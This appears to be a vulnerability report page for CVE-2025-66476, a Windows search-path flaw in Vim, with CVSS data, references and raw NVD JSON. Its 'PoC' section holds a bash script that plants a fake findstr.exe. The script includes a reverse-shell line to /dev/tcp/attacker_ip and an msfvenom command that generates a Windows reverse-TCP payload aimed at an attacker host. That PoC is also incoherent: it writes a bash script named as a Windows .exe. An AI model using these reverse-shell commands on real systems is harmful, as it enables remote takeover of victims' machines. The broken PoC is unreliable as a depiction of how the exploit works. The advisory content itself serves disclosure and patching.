Security Vulnerability Report
CVE-2025-66476 CVSS 7.8 HIGH

CVE-2025-66476

Published: 2025-12-02 22:16:10
Last Modified: 2026-01-30 18:50:30

Description

Vim is an open source, command-line text editor. Prior to version 9.1.1947, an uncontrolled search path vulnerability on Windows allows Vim to execute malicious executables placed in the current working directory of the file being edited. On Windows, when cmd.exe is used as the shell, Vim resolves external commands by searching the current working directory before the system paths. When Vim invokes tools such as findstr for :grep, runs external commands or filters via :!, or runs compiler/:make commands, it may inadvertently run a malicious executable present in the same directory as the file being edited. The issue affects Vim for Windows prior to version 9.1.1947.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Vim (Windows) < 9.1.1947

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-66476 PoC - Malicious executable placement
# This PoC demonstrates the uncontrolled search path vulnerability in Vim for Windows
# Attack scenario:
# 1. Attacker creates a malicious findstr.exe in a directory
# 2. Victim opens any file in that directory with Vim
# 3. Victim runs :grep command (which uses findstr internally)
# 4. Vim executes the malicious findstr.exe instead of the system one

echo "Creating malicious findstr.exe in current directory..."

# Malicious payload - reverse shell or arbitrary command execution
cat > findstr.exe << 'EOF'
#!/bin/bash
echo "Malicious findstr.exe executed!"
# Attacker can execute any command here
# Example: Reverse shell connection
# /bin/bash -i >& /dev/tcp/attacker_ip/port 0>&1
EOF

chmod +x findstr.exe
echo "PoC created. When victim runs :grep in Vim, the malicious findstr.exe will be executed."

# For Windows target, create actual Windows executable:
# Use msfvenom or similar to generate Windows payload:
# msfvenom -p windows/shell_reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > findstr.exe

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66476", "sourceIdentifier": "[email protected]", "published": "2025-12-02T22:16:09.940", "lastModified": "2026-01-30T18:50:29.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vim is an open source, command line text editor. Prior to version 9.1.1947, an uncontrolled search path vulnerability on Windows allows Vim to execute malicious executables placed in the current working directory for the current edited file. On Windows, when using cmd.exe as a shell, Vim resolves external commands by searching the current working directory before system paths. When Vim invokes tools such as findstr for :grep, external commands or filters via :!, or compiler/:make commands, it may inadvertently run a malicious executable present in the same directory as the file being edited. The issue affects Vim for Windows prior to version 9.1.1947."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.1947", "matchCriteriaId": "7F415DD0-063B-4239-B760-A7327109D919"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": 
[{"url": "https://github.com/vim/vim/commit/083ec6d9a3b7b09006e0ce69ac802597d25", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vim/vim/releases/tag/v9.1.1947", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/vim/vim/security/advisories/GHSA-g77q-xrww-p834", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/02/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}]}}